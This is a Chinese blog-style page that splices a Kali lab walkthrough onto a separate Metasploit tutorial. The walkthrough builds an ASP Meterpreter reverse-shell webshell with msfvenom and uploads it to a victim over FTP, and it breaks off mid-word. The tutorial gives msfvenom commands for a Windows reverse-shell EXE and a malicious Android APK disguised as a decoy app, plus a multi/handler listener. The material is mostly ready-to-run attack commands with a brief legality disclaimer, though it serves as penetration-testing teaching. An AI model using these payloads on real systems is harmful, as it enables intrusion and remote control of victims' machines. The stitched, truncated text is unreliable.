kali攻防第13章 Metasploit之生成webshell及应用

Metasploit之生成webshell及应用

 

准备工具

1、kali 系统 IP 10.10.10.131

2、受害者机子 IP 10.10.10.130

3、使用工具 Metasploit

 

步骤:

 

1、在msf生成asp脚本木马

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

 

上传shell.asp到受害者机子

root@kali:~# ftp

ftp> open 10.10.10.130

Connected to 10.10.10.130.

220 Microsoft FTP Service

Name (10.10.10.130:root): administrator

331&nb

### 使用 Kali Linux 和 Metasploit 生成 Payload 或病毒文件 在 Kali Linux 的 Metasploit 框架中,可以利用 `msfvenom` 工具生成各种类型的 payload 文件。以下是关于如何生成 payload 的详细说明: #### 1. **准备工作** 在开始之前,需确保已正确配置好 Metasploit 数据库并切换到 root 用户权限下操作。通过以下命令完成环境准备: ```bash sudo su msfdb init ``` #### 2. **使用 msfvenom 生成 Payload** `msfvenom` 是一个强大的工具,用于生成自定义的 exploit payloads 并将其导出为多种格式(如 `.exe`, `.dll`, `.apk` 等)。以下是具体方法: ##### (1)基本语法结构 ```bash msfvenom -p <payload> LHOST=<本地IP地址> LPORT=<监听端口> -f <输出格式> -o <保存路径> ``` - `-p`: 指定要使用的 payload 类型。 - `LHOST`: 设置反向连接的目标 IP 地址(即攻击者的 IP 地址)。 - `LPORT`: 设置监听端口号。 - `-f`: 输出文件格式(例如 exe, dll, apk 等)。 - `-o`: 将生成的 payload 保存到指定位置。 ##### (2)常见 Payload 示例 ###### Windows 反向 Shell (EXE 格式) 生成一个针对 Windows 系统的反向 shell EXE 文件: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/payload.exe ``` 此命令会生成名为 `payload.exe` 的恶意程序[^1]。 ###### Android APK 攻击载荷 如果目标设备是安卓手机,则可以选择生成 APK 文件作为诱饵应用程序: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R > /root/android_payload.apk ``` 这将创建一个带有 Meterpreter 功能的恶意 APK 应用程序[^3]。 #### 3. **设置监听器捕获连接** 为了接收来自受害主机发起的回调请求,在另一终端窗口启动 multi/handler 模块等待传入的数据流: ```ruby use exploit/multi/handler set PAYLOAD <与前面一致的payload名称> set LHOST <本地IP地址> set LPORT <相同端口号> exploit ``` #### 注意事项 尽管技术本身并无善恶之分,但非法入侵他人计算机系统属于违法行为,请务必仅限于合法授权范围内的安全研究活动之中!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

随行之旅

python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值